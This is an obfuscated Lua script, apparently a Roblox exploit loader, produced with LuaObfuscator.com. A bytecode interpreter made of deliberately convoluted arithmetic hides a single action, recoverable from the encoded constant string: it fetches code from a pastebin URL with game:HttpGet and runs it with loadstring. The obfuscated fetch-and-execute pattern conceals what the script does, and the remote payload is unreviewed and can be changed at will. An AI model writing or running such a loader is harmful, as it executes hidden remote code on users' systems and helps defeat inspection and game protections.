--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.4) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19 then local v89=v5(v81,v19);v19=nil;return v89;else return v81;end end end);local function v20(v31,v32,v33) if v33 then local v82=(v31/((5 -3)^(v32-(2 -1))))%((1 + 1)^(((v33-(1 -0)) -(v32-(878 -(282 + 595)))) + (1638 -(1523 + 114)))) ;return v82-(v82%(1 + 0)) ;else local v83=(117 -(32 + 85)) -0 ;local v84;while true do if (v83==((2695 -2076) -(555 + 64))) then v84=(1067 -(68 + 997))^(v32-1) ;return (((v31%(v84 + v84))>=v84) and (1 + 0)) or (931 -(191 + 666 + 74)) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (959 -(892 + 65)) );v18=v18 + (4 -2) ;return (v36 * (472 -216)) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (4 -(1 + 0)) );v18=v18 + (354 -(87 + 263)) ;return (v40 * (16777396 -(67 + 113))) + (v39 * (48056 + 17480)) + (v38 * (628 -(1478 -1106))) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=(303 + 650) -(802 + (265 -115)) ;local v44=(v20(v42,2 -1 ,36 -(454 -(145 + 293)) ) * ((2 + 0)^(1029 -((1345 -(44 + 386)) + 82)))) + v41 ;local v45=v20(v42,59 -38 ,19 + 12 );local v46=((v20(v42,41 -9 )==((973 + 215) -(1069 + 118))) and  -(2 -1)) or (1 -0) ;if (v45==(0 + (772 -(201 + 571)))) then if (v44==(0 -0)) then return v46 * (0 + 0) ;else v45=(2278 -(998 + 488)) -(368 + 423) ;v43=0 -0 ;end elseif (v45==(2065 -(10 + 8))) then return ((v44==(0 -0)) and (v46 * (((1581 -(116 + 1022)) -(416 + 26))/0))) or (v46 * NaN) ;end return v8(v46,v45-(3266 -2243) ) * (v43 + (v44/((1 + 1)^52))) ;end local function v25(v47) local v48;if  not v47 then local v85=0 -0 ;while true do if (v85==(0 + 0)) then v47=v23();if (v47==(859 -(814 + 45))) then return "";end break;end end end v48=v3(v16,v18,(v18 + v47) -(1 + 0) );v18=v18 + v47 ;local v49={};for v65=3 -2 , #v48 do v49[v65]=v2(v1(v3(v48,v65,v65)));end return v6(v49);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v50=0 + 0 ;local v51;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v50==(2 + 0)) then v55=nil;v56=nil;v50=3;end if (v50==1) then v53=nil;v54=nil;v50=2;end if ((9 -5)==v50) then while true do if (v51==2) then local v94=0;while true do if (v94==(2 -1)) then v51=3;break;end if (v94~=(1769 -(1749 + 20))) then else v56=nil;v57=nil;v94=1 + 0 ;end end end if (v51==(1323 -(1249 + 73))) then local v95=0 + 0 ;while true do if (0==v95) then v54=nil;v55=nil;v95=1146 -(466 + 679) ;end if (v95~=1) then else v51=4 -2 ;break;end end end if (v51==0) then local v96=0;while true do if (v96==(2 -1)) then v51=1901 -(106 + 1794) ;break;end if (v96~=(0 + 0)) then else v52=0 + 0 ;v53=nil;v96=1;end end end if (v51~=(8 -5)) then else v58=nil;while true do local v97=0 -0 ;while true do if (v97~=0) then else local v107=0;while true do if (v107==1) then v97=115 -(4 + 110) ;break;end if (v107~=(584 -(57 + 527))) then else if (v52==1) then local v143=1427 -(41 + 1386) ;local v144;while true do if (v143~=(103 -(17 + 86))) then else v144=0;while true do if (v144~=(1 + 0)) then else v58={};v52=3 -1 ;break;end if (v144==(0 -0)) then local v150=166 -(122 + 44) ;while true do if (v150~=(1 -0)) then else v144=1;break;end if (v150~=0) then else local v152=0;while true do if (v152~=1) then else v150=3 -2 ;break;end if (v152==0) then v56={v53,v54,nil,v55};v57=v23();v152=1;end end end end end end break;end end end if (v52~=(3 -1)) then else local v145=65 -(30 + 35) ;local v146;local v147;while true do if ((1 + 0)~=v145) then else while true do if (v146==0) then v147=0;while true do if (v147==0) then local v153=1257 -(1043 + 214) ;while true do if (v153==0) then for v162=3 -2 ,v57 do local v163=1212 -(323 + 889) ;local v164;local v165;local v166;while true do if (v163==1) then v166=nil;while true do if (v164==(0 -0)) then local v173=0;while true do if (v173==(581 -(361 + 219))) then v164=321 -(53 + 267) ;break;end if (v173==(0 + 0)) then v165=v21();v166=nil;v173=1;end end end if (v164~=(414 -(15 + 398))) then else if (v165==(983 -(18 + 964))) then v166=v21()~=(0 -0) ;elseif (v165==2) then v166=v24();elseif (v165~=(2 + 1)) then else v166=v25();end v58[v162]=v166;break;end end break;end if (v163==(0 + 0)) then v164=850 -(20 + 830) ;v165=nil;v163=1;end end end v56[3]=v21();v153=1 + 0 ;end if ((127 -(116 + 10))==v153) then v147=1 + 0 ;break;end end end if (v147~=(739 -(542 + 196))) then else for v155=1 -0 ,v23() do local v156=0;local v157;local v158;while true do if (v156~=0) then else v157=0;v158=nil;v156=1 + 0 ;end if (v156~=(1 + 0)) then else while true do if ((0 + 0)==v157) then v158=v21();if (v20(v158,1,2 -1 )~=0) then else local v167=0 -0 ;local v168;local v169;local v170;local v171;local v172;while true do if (v167~=(1552 -(1126 + 425))) then else v170=nil;v171=nil;v167=2;end if (v167~=2) then else v172=nil;while true do if (v168~=2) then else while true do if (v169==1) then local v177=405 -(118 + 287) ;local v178;while true do if (v177==0) then v178=0;while true do if (v178==(3 -2)) then v169=2;break;end if (v178==0) then local v188=1121 -(118 + 1003) ;local v189;while true do if (v188==0) then v189=0;while true do if (v189~=(0 -0)) then else local v192=377 -(142 + 235) ;while true do if (v192==0) then v172={v22(),v22(),nil,nil};if (v170==0) then local v197=977 -(553 + 424) ;local v198;while true do if (v197~=(0 -0)) then else v198=0 + 0 ;while true do if (v198==0) then v172[3]=v22();v172[4]=v22();break;end end break;end end elseif (v170==1) then v172[3 + 0 ]=v23();elseif (v170==(2 + 0)) then v172[2 + 1 ]=v23() -(2^(10 + 6)) ;elseif (v170~=(6 -3)) then else local v203=0 -0 ;local v204;local v205;while true do if (1~=v203) then else while true do if ((0 -0)~=v204) then else v205=0;while true do if (v205==0) then v172[1 + 2 ]=v23() -((9 -7)^(769 -(239 + 514))) ;v172[2 + 2 ]=v22();break;end end break;end end break;end if (v203==0) then v204=1329 -(797 + 532) ;v205=nil;v203=1;end end end v192=1;end if (v192==1) then v189=1;break;end end end if (1==v189) then v178=1;break;end end break;end end end end break;end end end if (v169==2) then local v179=0;local v180;local v181;while true do if (v179==0) then v180=0;v181=nil;v179=1;end if (v179==1) then while true do if (0==v180) then v181=0;while true do if (v181==0) then local v191=0;while true do if (v191~=0) then else if (v20(v171,1 + 0 ,1)~=(1 + 0)) then else v172[4 -2 ]=v58[v172[2]];end if (v20(v171,2,2)~=(1203 -(373 + 829))) then else v172[3]=v58[v172[734 -(476 + 255) ]];end v191=1;end if (v191==(1131 -(369 + 761))) then v181=1 + 0 ;break;end end end if (v181==(1 -0)) then v169=3;break;end end break;end end break;end end end if (v169==0) then local v182=0;local v183;while true do if (v182==0) then v183=0 -0 ;while true do if (v183~=(239 -(64 + 174))) then else v169=1;break;end if (v183==0) then local v190=0;while true do if (v190~=(0 + 0)) then else v170=v20(v158,2 -0 ,3);v171=v20(v158,340 -(144 + 192) ,222 -(42 + 174) );v190=1;end if (v190==1) then v183=1;break;end end end end break;end end end if (v169~=3) then else if (v20(v171,3 + 0 ,3 + 0 )==1) then v172[4]=v58[v172[4]];end v53[v155]=v172;break;end end break;end if (v168~=(1 + 0)) then else local v175=0;local v176;while true do if (v175~=(1504 -(363 + 1141))) then else v176=0;while true do if ((1580 -(1183 + 397))==v176) then local v187=0 -0 ;while true do if (v187==1) then v176=1;break;end if (v187==0) then v171=nil;v172=nil;v187=1 + 0 ;end end end if (v176~=(1 + 0)) then else v168=2;break;end end break;end end end if (v168~=(1975 -(1913 + 62))) then else v169=0 + 0 ;v170=nil;v168=1;end end break;end if (0==v167) then v168=0 -0 ;v169=nil;v167=1;end end end break;end end break;end end end v52=1936 -(565 + 1368) ;break;end end break;end end break;end if (v145==(0 -0)) then v146=0;v147=nil;v145=1662 -(1477 + 184) ;end end end v107=1 -0 ;end end end if (1==v97) then if (v52==0) then local v133=0;local v134;while true do if (v133==(0 + 0)) then v134=0;while true do if (v134~=(856 -(564 + 292))) then else local v148=0;local v149;while true do if (v148==(0 -0)) then v149=0;while true do if (v149==(2 -1)) then v134=305 -(244 + 60) ;break;end if (v149==0) then local v154=0;while true do if ((0 + 0)==v154) then v53={};v54={};v154=477 -(41 + 435) ;end if (v154==(1002 -(938 + 63))) then v149=1 + 0 ;break;end end end end break;end end end if ((1126 -(936 + 189))==v134) then v55={};v52=1 + 0 ;break;end end break;end end end if (v52==(1616 -(1565 + 48))) then local v135=0 + 0 ;local v136;local v137;while true do if (0==v135) then v136=1138 -(782 + 356) ;v137=nil;v135=268 -(176 + 91) ;end if (v135~=1) then else while true do if (v136==0) then v137=0 -0 ;while true do if (0==v137) then local v151=0 -0 ;while true do if (v151==(1092 -(975 + 117))) then for v159=1876 -(157 + 1718) ,v23() do v54[v159-(1 + 0) ]=v28();end return v56;end end end end break;end end break;end end end break;end end end break;end end break;end if ((0 -0)==v50) then v51=0;v52=nil;v50=1;end if (v50==(10 -7)) then v57=nil;v58=nil;v50=4;end end end local function v29(v59,v60,v61) local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...) local v67=v62;local v68=v63;local v69=v64;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v86=0,v75 do if (v86>=v69) then v73[v86-v69 ]=v74[v86 + 1 ];else v77[v86]=v74[v86 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=6) then if (v80<=2) then if (v80<=0) then v77[v79[2]]=v79[3];elseif (v80==1) then v77[v79[2]]();else v77[v79[2]]();end elseif (v80<=4) then if (v80>3) then do return;end else local v108=v79[2];v77[v108]=v77[v108](v13(v77,v108 + 1 ,v72));end elseif (v80==5) then local v110=v79[2];local v111,v112=v70(v77[v110](v13(v77,v110 + 1 ,v79[3])));v72=(v112 + v110) -1 ;local v113=0;for v130=v110,v72 do v113=v113 + 1 ;v77[v130]=v111[v113];end else local v114=v79[2];local v115=v77[v79[3]];v77[v114 + 1 ]=v115;v77[v114]=v115[v79[4]];end elseif (v80<=9) then if (v80<=7) then local v100=v79[2];local v101,v102=v70(v77[v100](v13(v77,v100 + 1 ,v79[3])));v72=(v102 + v100) -1 ;local v103=0;for v104=v100,v72 do v103=v103 + 1 ;v77[v104]=v101[v103];end elseif (v80>8) then local v119=0;local v120;local v121;while true do if (v119==0) then v120=v79[2];v121=v77[v79[3]];v119=1;end if (v119==1) then v77[v120 + 1 ]=v121;v77[v120]=v121[v79[4]];break;end end else v77[v79[2]]=v79[3];end elseif (v80<=11) then if (v80>10) then v77[v79[2]]=v61[v79[3]];else local v126=v79[2];v77[v126]=v77[v126](v13(v77,v126 + 1 ,v72));end elseif (v80==12) then do return;end else v77[v79[2]]=v61[v79[3]];end v71=v71 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F706173746562696E2E636F6D2F7261772F756679526247717A00083O00120B3O00013O00120B000100023O00200600010001000300122O000300044O0005000100034O00035O00022O00013O000100012O000C3O00017O00",v9(),...);
